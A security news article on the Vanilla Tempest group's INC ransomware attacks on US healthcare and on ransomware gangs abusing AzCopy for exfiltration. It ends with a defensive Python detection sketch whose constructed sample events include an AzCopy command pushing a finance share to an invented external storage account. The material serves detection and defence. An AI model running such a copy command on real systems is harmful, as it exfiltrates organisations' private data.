Microsoft has said that a financially motivated threat actor has been observed, for the first time, deploying a ransomware strain named INC in attacks on the healthcare sector in the U.S.
The tech giant's threat intelligence division is tracking the activity under the name Vanilla Tempest (previously DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts on X.
In the next stage, the attackers perform lateral movement over Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
The Windows maker said Vanilla Tempest has been active since at least July 2022, with prior attacks targeting the education, healthcare, IT, and manufacturing sectors using multiple ransomware families, including BlackCat, Quantum Locker, Zeppelin, and Rhysida.
It's worth noting that the threat actor is also tracked under the moniker Vice Society, which is known for leveraging existing lockers to carry out its attacks rather than building one of its own.
The news comes as ransomware gangs like BianLian and Rhysida have increasingly been observed using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an effort to evade detection.
"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.
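Two of the behaviours described above, WMI Provider Host (WmiPrvSE.exe) launching a payload and AzCopy or Azure Storage Explorer pushing data to cloud storage, are both visible in process-creation telemetry. The detection sketch below is an added example for defenders, not code from Microsoft, modePUSH or any of the groups named in the article. It runs over a handful of constructed Sysmon-style process-creation events (constructed here, not real telemetry) and assumes a hypothetical allow-list of approved storage accounts; the storage account names and file paths in the sample events are invented.

```python
"""Detection sketch (added example): flag WmiPrvSE.exe spawning payloads and
AzCopy / Azure Storage Explorer uploads to unapproved Azure storage accounts.
Input is a constructed list of process-creation events with Sysmon Event ID 1
style fields; nothing here is real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# WmiPrvSE.exe hosts WMI providers; it is started by svchost.exe (WinMgmt) and
# should not itself launch executables out of user-writable directories.
WMI_HOST = "wmiprvse.exe"
BENIGN_WMI_CHILDREN = {"wmiprvse.exe", "werfault.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "rundll32.exe", "wscript.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|windows\\temp)\\", re.I)

# Tools the article reports being repurposed for bulk data transfer to Azure.
CLOUD_TRANSFER_TOOLS = {"azcopy.exe", "microsoft azure storage explorer.exe"}
UPLOAD_VERBS = re.compile(r"\b(copy|cp|sync)\b", re.I)
BLOB_ENDPOINT = re.compile(r"https://[^\s\"']+\.blob\.core\.windows\.net", re.I)
# Hypothetical allow-list: storage accounts the organisation actually owns.
ALLOWED_ACCOUNTS = {"corpbackup.blob.core.windows.net"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_wmi_payload_launch(ev: ProcessEvent):
    """Alert when WmiPrvSE.exe spawns an interpreter or anything from a
    user-writable location (payload delivery via the WMI Provider Host)."""
    if basename(ev.parent_image) != WMI_HOST:
        return None
    child = basename(ev.image)
    if child in BENIGN_WMI_CHILDREN:
        return None
    if child in INTERPRETERS or USER_WRITABLE.search(ev.image):
        return f"{ev.host}: WmiPrvSE.exe spawned {child} ({ev.image})"
    return None


def detect_cloud_exfil(ev: ProcessEvent):
    """Alert when a cloud transfer tool uploads to a storage account that is
    not on the allow-list (bulk exfiltration to attacker-controlled storage)."""
    if basename(ev.image) not in CLOUD_TRANSFER_TOOLS:
        return None
    if not UPLOAD_VERBS.search(ev.command_line):
        return None
    m = BLOB_ENDPOINT.search(ev.command_line)
    if not m:
        return None
    account = m.group(0).split("//", 1)[1].split("/", 1)[0].lower()
    if account in ALLOWED_ACCOUNTS:
        return None
    return f"{ev.host}: {basename(ev.image)} uploading to unapproved account {account}"


RULES = (detect_wmi_payload_launch, detect_cloud_exfil)


def scan(events):
    """Run every rule over every event; return the list of alert strings."""
    return [a for ev in events for rule in RULES if (a := rule(ev))]


# Constructed sample events: two benign, two matching the reported tradecraft.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ProcessEvent("WS01", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\ProgramData\update\win.exe", "win.exe --install"),
    ProcessEvent("BK01", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\azcopy\azcopy.exe",
                 'azcopy.exe copy "D:\\backups" '
                 '"https://corpbackup.blob.core.windows.net/nightly?sv=SAS" --recursive'),
    ProcessEvent("FS02", r"C:\Windows\System32\cmd.exe",
                 r"C:\Users\Public\azcopy.exe",
                 'azcopy.exe copy "\\\\fs02\\finance" '
                 '"https://stg7x1q.blob.core.windows.net/data?sv=SAS" --recursive'),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The WMI rule keys on the parent/child relationship rather than on the payload's file name, so it does not depend on knowing the ransomware binary in advance; the exfiltration rule keys on the destination storage account, which is what distinguishes a legitimate backup job from the same tool pushing data to an account the organisation does not own.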